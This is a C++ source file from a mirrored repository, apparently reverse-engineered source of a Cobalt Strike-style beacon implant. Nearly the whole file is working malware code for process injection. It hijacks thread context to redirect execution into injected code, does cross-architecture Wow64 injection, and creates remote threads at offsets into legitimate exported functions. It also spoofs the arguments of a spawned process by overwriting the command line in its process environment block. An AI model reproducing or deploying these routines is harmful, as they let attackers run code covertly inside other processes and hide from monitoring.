qwqdanchun
/
ReBeacon_Src
mirror of https://github.com/qwqdanchun/ReBeacon_Src.git
1
0
Fork 1
Code Issues Projects Releases Wiki Activity
ReBeacon_Src/ReBeacon_Src/BeaconX64.cpp

272 lines
6.5 KiB
C++
Raw Permalink Blame History

/*
x64兼容完成但是进程注入部分有几个方法暂未实现
*/
#include "BeaconX64.h"
#include "comm.h"
#include "common.h"
#ifdef _WIN64
//x64注入x86
BOOL sub_180012278(HANDLE hThread, DWORD BaseAddress, DWORD64 lpParameter)
{
if (lpParameter)
{
return 0;
}
WOW64_CONTEXT Context;
Context.ContextFlags = 0x100002;
if (!Wow64GetThreadContext(hThread, &Context))
{
return 0;
}
Context.Eax = BaseAddress;
if (!Wow64SetThreadContext(hThread, &Context))
{
return 0;
}
return ResumeThread(hThread) != -1;
}
//x64注入x64
BOOL sub_1800121EC(HANDLE hThread, DWORD64 BaseAddress, DWORD64 lpParameter)
{
CONTEXT Context;
Context.ContextFlags = 0x100002;
if (!GetThreadContext(hThread, &Context))
{
return 0;
}
Context.Rcx = BaseAddress;
Context.Rdx = lpParameter;
if (!SetThreadContext(hThread, &Context))
{
return 0;
}
return ResumeThread(hThread) != -1;
}
BOOL sub_1800121D8(BeaconProcessInject* pBeaconProcessInject, DWORD64 BaseAddress, DWORD64 lpParameter)
{
HANDLE hThread = pBeaconProcessInject->hThread;
if (pBeaconProcessInject->is_process_arch == 0)
{
return sub_180012278(hThread, BaseAddress, lpParameter);
}
else
{
return sub_1800121EC(hThread, BaseAddress, lpParameter);
}
}
int sub_10003444(PROCESS_INFORMATION* pInfo, BeaconParameterSpoofing* pBPS)
{
DWORD flOldProtect;
if (is_process_arch(pInfo->hProcess))
{
BeaconErrorNA(0x40);
return 0;
}
CONTEXT Context;
DWORD64 addr = 0;
UNICODE_STRING CommandLine = { 0 };
Context.ContextFlags = 0x10002;
if (!GetThreadContext(pInfo->hThread, &Context)
|| !ReadProcessMemory(pInfo->hProcess, (LPCVOID)(Context.Rdx + 32), &addr, 8, 0)
|| !ReadProcessMemory(pInfo->hProcess, (LPCVOID)(addr + 112), &CommandLine, sizeof(UNICODE_STRING), 0)
|| !VirtualProtectEx(pInfo->hProcess, (LPVOID)CommandLine.Buffer, CommandLine.MaximumLength, 4, &flOldProtect))
{
BeaconErrorD(0x41, GetLastError());
return 0;
}
char* argc = (char*)malloc(CommandLine.MaximumLength);
memset(argc, 0, CommandLine.MaximumLength);
if (!toWideChar(pBPS->cmd, (LPWSTR)argc, CommandLine.MaximumLength))
{
BeaconErrorNA(0x42);
free(argc);
return 0;
}
SIZE_T NumberOfBytesWritten;
if (!WriteProcessMemory(pInfo->hProcess, (LPVOID)CommandLine.Buffer, argc, CommandLine.MaximumLength, &NumberOfBytesWritten))
{
BeaconErrorD(65, GetLastError());
free(argc);
return 0;
}
return 1;
}
BOOL sub_10004FA1(
int Remote,
HANDLE hProcess,
PVOID BaseAddress,
LPVOID lpParameter,
LPCSTR lpModuleName,
LPCSTR lpProcName,
int offset)
{
HANDLE Thread = NULL;
FARPROC ProcAddress = GetProcAddress(GetModuleHandleA(lpModuleName), lpProcName);
if (!ProcAddress)
{
return 0;
}
if (Remote == 6)
{
Thread = CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE)((char*)ProcAddress + offset), lpParameter, CREATE_SUSPENDED, NULL);
}
else
{
if (Remote != 7)
{
return 0;
}
Thread = CreateRemoteThread(hProcess, 0, 0, (LPTHREAD_START_ROUTINE)((char*)ProcAddress + offset), lpParameter, CREATE_SUSPENDED, 0);
}
if (!Thread)
{
return 0;
}
CONTEXT Context;
Context.ContextFlags = 0x10000B;
if (!GetThreadContext(Thread, &Context))
{
return 0;
}
Context.Rcx = (DWORD64)BaseAddress;
if (!SetThreadContext(Thread, &Context))
{
return 0;
}
return ResumeThread(Thread) != -1;
}
#else
BOOL sub_10005463(BeaconProcessInject* pBeaconProcessInject, char* BaseAddress, LPVOID lpParameter)
{
if (lpParameter)
{
return 0;
}
if (!pBeaconProcessInject->is_system_process)
{
return 0;
}
CONTEXT Context;
Context.ContextFlags = 0x10002;
if (!GetThreadContext(pBeaconProcessInject->hThread, &Context))
{
return 0;
}
Context.Eax = (DWORD)BaseAddress;
return SetThreadContext(pBeaconProcessInject->hThread, &Context)
&& ResumeThread(pBeaconProcessInject->hThread) != -1;
}
int sub_10003444(PROCESS_INFORMATION* pInfo, BeaconParameterSpoofing* pBPS)
{
DWORD flOldProtect;
if (is_process_arch(pInfo->hProcess))
{
BeaconErrorNA(0x40);
return 0;
}
CONTEXT Context;
DWORD addr = 0;
UNICODE_STRING CommandLine = { 0 };
Context.ContextFlags = 0x10002;
if (!GetThreadContext(pInfo->hThread, &Context)
|| !ReadProcessMemory(pInfo->hProcess, (LPCVOID)(Context.Ebx + 16), &addr, 4u, 0)
|| !ReadProcessMemory(pInfo->hProcess, (LPCVOID)(addr + 64), &CommandLine, 8, 0)
|| !VirtualProtectEx(pInfo->hProcess, (LPVOID)CommandLine.Buffer, CommandLine.Length, 4, &flOldProtect))
{
BeaconErrorD(0x41, GetLastError());
return 0;
}
char* argc = (char*)malloc(CommandLine.Length);
memset(argc, 0, CommandLine.Length);
if (!toWideChar(pBPS->cmd, (LPWSTR)argc, CommandLine.Length))
{
BeaconErrorNA(0x42);
free(argc);
return 0;
}
SIZE_T NumberOfBytesWritten;
if (!WriteProcessMemory(pInfo->hProcess, (LPVOID)CommandLine.Buffer, argc, CommandLine.Length, &NumberOfBytesWritten))
{
BeaconErrorD(65, GetLastError());
free(argc);
return 0;
}
return 1;
}
BOOL sub_10004FA1(
int Remote,
HANDLE hProcess,
PVOID BaseAddress,
LPVOID lpParameter,
LPCSTR lpModuleName,
LPCSTR lpProcName,
int offset)
{
HANDLE Thread = NULL;
FARPROC ProcAddress = GetProcAddress(GetModuleHandleA(lpModuleName), lpProcName);
if (!ProcAddress)
{
return 0;
}
if (Remote == 6)
{
Thread = CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE)((char*)ProcAddress + offset), lpParameter, CREATE_SUSPENDED, NULL);
}
else
{
if (Remote != 7)
{
return 0;
}
Thread = CreateRemoteThread(hProcess, 0, 0, (LPTHREAD_START_ROUTINE)((char*)ProcAddress + offset), lpParameter, CREATE_SUSPENDED, 0);
}
if (!Thread)
{
return 0;
}
CONTEXT Context;
Context.ContextFlags = 0x10007;
if (!GetThreadContext(Thread, &Context))
{
return 0;
}
Context.Eax = (DWORD)BaseAddress;
if (!SetThreadContext(Thread, &Context))
{
return 0;
}
return ResumeThread(Thread) != -1;
}
#endif // _WIN64
Reference in New Issue View Git Blame Copy Permalink